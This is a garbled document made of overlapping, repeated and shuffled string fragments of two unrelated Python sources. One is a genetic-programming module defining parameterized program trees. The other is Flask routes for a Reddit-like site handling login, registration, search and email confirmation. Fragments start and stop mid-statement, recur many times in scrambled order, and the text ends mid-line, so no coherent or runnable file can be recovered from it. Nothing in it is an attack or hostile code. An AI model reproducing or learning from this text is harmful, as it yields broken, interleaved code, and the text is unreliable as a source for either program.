prefix) return res def _set_dirty(self): raise Exception(\"Parameterized trees should", "tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in", "2 def get_flat_parameters(self): params = [] for tree in self.parameterized_trees:", "\"children\"): for child in self.underlying_tree.children: res += child.display(prefix=\" \" +", "ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree = underlying_tree", "load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes", "return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self, params): n_used", "in a field .children and that the underlying tree has", "get_params(self): return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) *", "has the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if", "+ self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix): res", "@staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees]", "child.display(prefix=\" \" + prefix) return res def _set_dirty(self): raise Exception(\"Parameterized", "children of the underlying tree are in a field .children", "self.weight, self.bias ) def get_params(self): return [self.weight, self.bias] def __call__(self,", "# This makes the assumption that all children of the", "parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in", "for tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used :", "\" * {} + {}\".format( self.weight, self.bias ) def get_params(self):", "This makes the assumption that all children of the underlying", "class ParameterizedTree(ProgramTree): # This makes the assumption that all children", "self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return res def", "raise Exception(\"Parameterized trees should not be mutated\") def in_order(self): yield", "underlying_tree if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def", "if init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self,", "None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias", "def __len__(self): return sum(len(tree) for tree in self.parameterized_trees) def set_flat_parameters(self,", "node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod", "tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used += 2 def", "\"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res +=", "child in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return", "be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for", "*x): return [tree(*x) for tree in self.parameterized_trees] def __len__(self): return", ") @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return", "all children of the underlying tree are in a field", ") def get_params(self): return [self.weight, self.bias] def __call__(self, *x): return", "and that the underlying tree has the field .name def", "_copy=False) for child in underlying_tree.children ] self.underlying_tree = underlying_tree if", "def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] )", "self.bias = params self.name = self.underlying_tree.name + \" * {}", "safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False)", "= 0 for tree in self.parameterized_trees: for node in tree.in_order():", "should not be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree,", "params): n_used = 0 for tree in self.parameterized_trees: for node", "return res def _set_dirty(self): raise Exception(\"Parameterized trees should not be", "+ \" * {} + {}\".format( self.weight, self.bias ) def", "+= 2 def get_flat_parameters(self): params = [] for tree in", "self.parameterized_trees: for node in tree.in_order(): params += node.get_params() return np.array(params)", "in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is None:", "def get_params(self): return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x)", "ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind):", "from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree):", "underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ]", "ParameterizedTree(ProgramTree): # This makes the assumption that all children of", "self.name = self.underlying_tree.name + \" * {} + {}\".format( self.weight,", "the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy:", "+= child.display(prefix=\" \" + prefix) return res def _set_dirty(self): raise", "import ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption that", "a field .children and that the underlying tree has the", "def set_flat_parameters(self, params): n_used = 0 for tree in self.parameterized_trees:", "field .name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree", "in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix) return res", "def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for", "if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree,", "*x): return self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return", "tree in ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def", "_copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if", "that all children of the underlying tree are in a", "[self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight +", "underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety", "node.set_params(list(params[n_used : n_used + 2])) n_used += 2 def get_flat_parameters(self):", "for node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used", "are in a field .children and that the underlying tree", "params self.name = self.underlying_tree.name + \" * {} + {}\".format(", "the underlying tree are in a field .children and that", "self.weight + self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix):", "in self.underlying_tree.children: for node in child.in_order(): yield node class ParameterizedIndividual:", "return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def", "for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname))", "tree has the field .name def __init__(self, underlying_tree, init_fct=None, _copy=True):", "return self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return len(self.underlying_tree)", "return len(self.underlying_tree) def display(self, prefix): res = prefix + self.name", "field .children and that the underlying tree has the field", "if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child", "# safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child,", "for child in self.underlying_tree.children: for node in child.in_order(): yield node", "= copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children =", "self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias =", "res = prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"):", "for tree in self.parameterized_trees: for node in tree.in_order(): params +=", "def __init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return", "* self.weight + self.bias def __len__(self): return len(self.underlying_tree) def display(self,", "np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class", "def __len__(self): return len(self.underlying_tree) def display(self, prefix): res = prefix", "self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias", "ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname):", ".name def __init__(self, underlying_tree, init_fct=None, _copy=True): if _copy: underlying_tree =", "Exception(\"Parameterized trees should not be mutated\") def in_order(self): yield self", "mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child", ".children and that the underlying tree has the field .name", "underlying tree are in a field .children and that the", "= [ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree", "prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child", "* {} + {}\".format( self.weight, self.bias ) def get_params(self): return", "self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used + 2]))", "def display(self, prefix): res = prefix + self.name + \"\\n\"", "the underlying tree has the field .name def __init__(self, underlying_tree,", "hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node in child.in_order():", "ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x):", "init_fct=None, _copy=True): if _copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first", "def __call__(self, *x): return self.underlying_tree(*x) * self.weight + self.bias def", "from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod", "tree in self.parameterized_trees: for node in tree.in_order(): params += node.get_params()", "n_used + 2])) n_used += 2 def get_flat_parameters(self): params =", "the assumption that all children of the underlying tree are", "__init__(self, parameterized_trees): self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual(", "import copy import numpy as np from racer.utils import load_pickle", "import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This", "0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params", "yield self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for", "0 for tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used", "len(self.underlying_tree) def display(self, prefix): res = prefix + self.name +", "for child in self.underlying_tree.children: res += child.display(prefix=\" \" + prefix)", "in child.in_order(): yield node class ParameterizedIndividual: def __init__(self, parameterized_trees): self.parameterized_trees", "[tree(*x) for tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for", "child in self.underlying_tree.children: for node in child.in_order(): yield node class", "assumption that all children of the underlying tree are in", "self.bias def __len__(self): return len(self.underlying_tree) def display(self, prefix): res =", "2])) n_used += 2 def get_flat_parameters(self): params = [] for", "[] for tree in self.parameterized_trees: for node in tree.in_order(): params", "for node in child.in_order(): yield node class ParameterizedIndividual: def __init__(self,", "self if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: for node", "__len__(self): return len(self.underlying_tree) def display(self, prefix): res = prefix +", "= prefix + self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for", "res += child.display(prefix=\" \" + prefix) return res def _set_dirty(self):", "in tree.in_order(): node.set_params(list(params[n_used : n_used + 2])) n_used += 2", "self.bias ) def get_params(self): return [self.weight, self.bias] def __call__(self, *x):", "hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in", "= [] for tree in self.parameterized_trees: for node in tree.in_order():", "def __call__(self, *x): return [tree(*x) for tree in self.parameterized_trees] def", "in self.parameterized_trees) def set_flat_parameters(self, params): n_used = 0 for tree", "\"children\"): for child in self.underlying_tree.children: for node in child.in_order(): yield", "for tree in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree", "self.weight, self.bias = params self.name = self.underlying_tree.name + \" *", "display(self, prefix): res = prefix + self.name + \"\\n\" if", "+ 2])) n_used += 2 def get_flat_parameters(self): params = []", "return [self.weight, self.bias] def __call__(self, *x): return self.underlying_tree(*x) * self.weight", "\" + prefix) return res def _set_dirty(self): raise Exception(\"Parameterized trees", "init_fct is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params):", "self.underlying_tree.children: for node in child.in_order(): yield node class ParameterizedIndividual: def", "copy import numpy as np from racer.utils import load_pickle from", "_copy: underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"):", "{}\".format( self.weight, self.bias ) def get_params(self): return [self.weight, self.bias] def", "underlying tree has the field .name def __init__(self, underlying_tree, init_fct=None,", "params): self.weight, self.bias = params self.name = self.underlying_tree.name + \"", "not be mutated\") def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"):", "self.set_params(init_fct()) def set_params(self, params): self.weight, self.bias = params self.name =", "= params self.name = self.underlying_tree.name + \" * {} +", "in self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in self.parameterized_trees)", "return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree in", "self.parameterized_trees = parameterized_trees @staticmethod def from_individual(ind): return ParameterizedIndividual( parameterized_trees=[ParameterizedTree(tree) for", "ProgramTree class ParameterizedTree(ProgramTree): # This makes the assumption that all", "prefix): res = prefix + self.name + \"\\n\" if hasattr(self.underlying_tree,", "copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [", "self.underlying_tree(*x) * self.weight + self.bias def __len__(self): return len(self.underlying_tree) def", "in ind.trees] ) @staticmethod def from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self,", "underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1,", "<filename>racer/methods/genetic_programming/parameterized.py<gh_stars>1-10 import copy import numpy as np from racer.utils import", "def set_params(self, params): self.weight, self.bias = params self.name = self.underlying_tree.name", "res def _set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\")", "tree in self.parameterized_trees: for node in tree.in_order(): node.set_params(list(params[n_used : n_used", "import numpy as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree", "hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res += child.display(prefix=\" \"", "self.underlying_tree = underlying_tree if init_fct is None: self.set_params([1, 0]) else:", "in self.parameterized_trees: for node in tree.in_order(): params += node.get_params() return", "self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children:", "racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): #", "numpy as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import", "from_pickled_individual(fname): return ParameterizedIndividual.from_individual(load_pickle(fname)) def __call__(self, *x): return [tree(*x) for tree", "{} + {}\".format( self.weight, self.bias ) def get_params(self): return [self.weight,", "as np from racer.utils import load_pickle from racer.methods.genetic_programming.program_tree import ProgramTree", "n_used = 0 for tree in self.parameterized_trees: for node in", "self.underlying_tree.name + \" * {} + {}\".format( self.weight, self.bias )", "\"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children", "child in underlying_tree.children ] self.underlying_tree = underlying_tree if init_fct is", "is None: self.set_params([1, 0]) else: self.set_params(init_fct()) def set_params(self, params): self.weight,", "def in_order(self): yield self if hasattr(self.underlying_tree, \"children\"): for child in", "self.parameterized_trees] def __len__(self): return sum(len(tree) for tree in self.parameterized_trees) def", "tree are in a field .children and that the underlying", "def _set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\") def", "+ {}\".format( self.weight, self.bias ) def get_params(self): return [self.weight, self.bias]", "+ self.name + \"\\n\" if hasattr(self.underlying_tree, \"children\"): for child in", "first if hasattr(underlying_tree, \"children\"): underlying_tree.children = [ ParameterizedTree(underlying_tree=child, _copy=False) for", "if hasattr(self.underlying_tree, \"children\"): for child in self.underlying_tree.children: res += child.display(prefix=\"", "_set_dirty(self): raise Exception(\"Parameterized trees should not be mutated\") def in_order(self):", "def get_flat_parameters(self): params = [] for tree in self.parameterized_trees: for", "underlying_tree = copy.deepcopy(underlying_tree) # safety first if hasattr(underlying_tree, \"children\"): underlying_tree.children", "parameterized_trees=[ParameterizedTree(tree) for tree in ind.trees] ) @staticmethod def from_pickled_individual(fname): return", "from racer.methods.genetic_programming.program_tree import ProgramTree class ParameterizedTree(ProgramTree): # This makes the", "[ ParameterizedTree(underlying_tree=child, _copy=False) for child in underlying_tree.children ] self.underlying_tree =" ]
[ "redirect(url_for('frontends.home')) next = '' if request.method == 'GET': if 'next'", "to his or her original place before logging in \"\"\"", "Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted", "as search_module # don't override function name from base.users.forms import", "get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST'])", "left off if so user = User.query.filter_by(email=form.email.data).first() # we use", "her original place before logging in \"\"\" if g.user: return", "or password', 'danger') return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST'])", "= base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\"", "search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches = rs.count()", "\"\"\" We had to do some extra work to route", "if subreddit else Thread.query # Filter by user subs logger.info(g.user)", "base_query = base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot': base_query", "= subreddit_subs() for subreddit in subreddit_list: sform = sub_form() sform.sub_name", "db.session.commit() session['user_id'] = user.id flash('Thanks for signing up! Please confirm", "function name from base.users.forms import RegisterForm, LoginForm from base.users.models import", "logged in send them home return redirect(url_for('frontends.home')) next = ''", "import search as search_module # don't override function name from", "'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata)", "page \"\"\" if g.user: # If the user is logged", "Subreddit.query.all() form = None if g.user: if request.form: form =", "= user.id flash('Thanks for signing up! Please confirm your email", "and check_password_hash(user.password, form.password.data): # the session can't be modified as", "the confirmation email.', 'success') if 'next' in request.form and request.form['next']:", "comments \"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\" rs", "send_email from base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__,", "= request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation',", "None if g.user: if request.form: form = subreddit_subs(request.form) if form.validate_on_submit():", "page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to", "before_request(): g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id']) def", "import check_password_hash, generate_password_hash from logzero import logger from base import", "request.args.get('query') page_title=f\"Search results for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True,", "redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return render_template(\"login.html\",", "set of subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False,", "and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next)", "request.form: form = subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs", "redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\"", "== 'GET': if 'next' in request.args: next = request.args['next'] form", "you for confirming your email! You can now submit and", "line of code :) base_query = subreddit.threads if subreddit else", "session['user_id'] = user.id flash('Thanks for signing up! Please confirm your", "sub_form from base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type", "import RegisterForm, LoginForm from base.users.models import User from base.threads.models import", "db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs", "\"\"\" abstracted because many sources pull from a thread listing", "== 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query", "import Thread, Publication from base.subreddits.models import Subreddit from base.users.decorators import", "g.user: return redirect(url_for('frontends.home')) next = '' if request.method == 'GET':", "the link sent in the confirmation email.', 'success') if 'next'", "# quickly paginate some arbitrary data, no sorting if rs:", "quickly paginate some arbitrary data, no sorting if rs: thread_paginator", "# If the user is logged in send them home", "an user instance not yet stored in the database user", "import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request def", "'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\"", "user.id if 'next' in request.form and request.form['next']: return redirect(request.form['next']) return", "werzeug to validate user's password if user and check_password_hash(user.password, form.password.data):", "listing source (subreddit permalink, homepage, etc) \"\"\" threads_per_page = 15", "= subreddit_subs(request.form) if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name']", "= g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs", "in request.args: next = request.args['next'] form = LoginForm(request.form) # make", "but doesn't validate password is right if form.validate_on_submit(): # continue", "# Filter by user subs logger.info(g.user) if g.user: subreddit_subs =", "as it's signed, # it's a safe place to store", "password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert the record in our database", "cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\"))", "a safe place to store the user id session['user_id'] =", "# create an user instance not yet stored in the", "paginate some arbitrary data, no sorting if rs: thread_paginator =", "don't override function name from base.users.forms import RegisterForm, LoginForm from", "= LoginForm(request.form) # make sure data is valid, but doesn't", "or 1 cur_page = int(cur_page) thread_paginator = None # if", "= f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks', 'nofollow', 'target-blank-links',", "home(sort_type='hot'): \"\"\" If not trending we order by creation date", "and comments \"\"\" query = request.args.get('query') page_title=f\"Search results for '{query}'\"", "Confirm user email \"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token ==", "= base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot': base_query =", "users to search threads and comments \"\"\" query = request.args.get('query')", "base_query.join(Subreddit).filter(Subreddit.name.in_(subreddit_subs)) # Sorting if sort_type == 'hot': base_query = base_query.order_by(db.desc(Thread.hotness))", "Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits = Subreddit.query.all()", "form.validate_on_submit(): # create an user instance not yet stored in", "validate password is right if form.validate_on_submit(): # continue where we", "= RegisterForm(request.form) if form.validate_on_submit(): # create an user instance not", "__name__, url_prefix='') @mod.before_request def before_request(): g.user = None if session.get('user_id'):", "logger.info(g.user) if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness))", "atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\"", "\"\"\" threads_per_page = 15 cur_page = request.args.get('page') or 1 cur_page", "orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs) #rs = rs.all() num_searches", "base.users.models import User from base.threads.models import Thread, Publication from base.subreddits.models", "'r') as f: content = f.read() md = markdown2.markdown(content, extras", "render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\"", "error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'): \"\"\" If not trending", "not trending we order by creation date \"\"\" atom_url =", "order by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True)", "session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user", "num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We had to", "he now has an id db.session.commit() session['user_id'] = user.id flash('Thanks", "base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date))", "= True if request.path.endswith('trending') else False page_title = \"Trending\" if", "markdown2 from flask import (Blueprint, request, render_template, flash, g, session,", "for '{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator =", "check_password_hash(user.password, form.password.data): # the session can't be modified as it's", "= form.data.get('subs') form_subs = list(set([x['sub_name'] for x in form_subs if", "in, as he now has an id db.session.commit() session['user_id'] =", "view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None if", "return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email or password', 'danger') return", "for subreddit in subreddit_list: sform = sub_form() sform.sub_name = subreddit.name", "If the user is logged in send them home return", "@mod.before_request def before_request(): g.user = None if session.get('user_id'): g.user =", "page_title = \"Trending\" if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending)", "g.user.subreddit_subs.get('subs') subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) \\ .filter(Subreddit.name.in_(subreddit_subs)) else: subs =", "g.user = None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit():", "user subreddits otherwise fetch a list of defaults \"\"\" if", "Subs\", 'success') db.session.commit() else: form = subreddit_subs() for subreddit in", "db.session.commit() else: form = subreddit_subs() for subreddit in subreddit_list: sform", "confirm your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in,", "= sub_form() sform.sub_name = subreddit.name sform.sub_group = subreddit.group if g.user:", "route the user back to his or her original place", "subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set", "if rs: thread_paginator = rs.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator #", "elif sort_type == 'comments': base_query = base_query.order_by(db.desc(Thread.n_comments)) elif sort_type ==", "the database user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string())", "safe place to store the user id session['user_id'] = user.id", "email_confirm_link), user.email) # Log the user in, as he now", "methods=['GET', 'POST']) def register(): \"\"\" Registration page \"\"\" if g.user:", "sexy line of code :) base_query = subreddit.threads if subreddit", "15 cur_page = request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator", "x in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs} flash(\"Updated", "form = subreddit_subs() for subreddit in subreddit_list: sform = sub_form()", "request.args.get('page') or 1 cur_page = int(cur_page) thread_paginator = None #", "that means we are just looking to # quickly paginate", "redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page): page_md = f\"base/markdown/{page}.md\" if not", "form = None if g.user: if request.form: form = subreddit_subs(request.form)", "to do some extra work to route the user back", "subreddit else Thread.query # Filter by user subs logger.info(g.user) if", "**md.metadata) @mod.route('/search/', methods=['GET']) def search(): \"\"\" Allows users to search", "'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\" Registration", "modified as it's signed, # it's a safe place to", "homepage, etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page') or", "num_searches = rs.count() subreddits = get_subreddits() return render_template('home.html', page_title=page_title, cur_subreddit=home_subreddit(),", "flash, g, session, redirect, url_for, abort, Markup) from werkzeug import", "Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return subs def get_subreddits(): \"\"\" Fetch user subreddits", "f: content = f.read() md = markdown2.markdown(content, extras = ['fenced-code-blocks',", "for confirming your email! You can now submit and comment.\",", "subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else False page_title", "@mod.route('/.xml') @mod.route('/.rss') def atom_redirect(): return redirect(url_for(\"subreddits.atom_feed\", subreddit_name=\"frontpage\")) @mod.route('/h/<string:page>') def render_markdown(page):", "session, redirect, url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash", "token = user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit", "send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the link below to confirm", "flash('Thanks for signing up! Please confirm your email by following", "'nofollow', 'target-blank-links', 'toc', 'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md,", "'hot': base_query = base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query =", "return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def confirm_email(token): \"\"\" Confirm user email \"\"\"", "base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query = base_query.join(Publication).order_by(db.desc(Publication.pub_date)) thread_paginator =", "g, session, redirect, url_for, abort, Markup) from werkzeug import check_password_hash,", "'{query}'\" rs = search_module.search(query, orderby='creation', search_title=True, search_text=True) thread_paginator = process_thread_paginator(rs=rs)", "if g.get('user'): subreddit_subs = g.user.subreddit_subs.get('subs') subreddits = Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: #", "Subreddit from base.users.decorators import requires_login from base.utils.user_utils import get_school from", "yet stored in the database user = User(username=form.username.data, email=form.email.data, \\", "for signing up! Please confirm your email by following the", "code :) base_query = subreddit.threads if subreddit else Thread.query #", "make sure data is valid, but doesn't validate password is", "continue where we left off if so user = User.query.filter_by(email=form.email.data).first()", "confirm your email by following the link sent in the", "search(): \"\"\" Allows users to search threads and comments \"\"\"", "logzero import logger from base import db, app from base", "if form.validate_on_submit(): form_subs = form.data.get('subs') form_subs = list(set([x['sub_name'] for x", "per_page=threads_per_page, error_out=True) return thread_paginator # sexy line of code :)", "return render_template(\"login.html\", form=form, next=next) @mod.route('/logout/', methods=['GET', 'POST']) @requires_login def logout():", "date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True", "def login(): \"\"\" We had to do some extra work", "for x in form_subs if x['value']])) g.user.subreddit_subs = {'subs': form_subs}", "from werkzeug import check_password_hash, generate_password_hash from logzero import logger from", "some extra work to route the user back to his", "if so user = User.query.filter_by(email=form.email.data).first() # we use werzeug to", "permalink, homepage, etc) \"\"\" threads_per_page = 15 cur_page = request.args.get('page')", "trending else \"Frontpage\" thread_paginator = 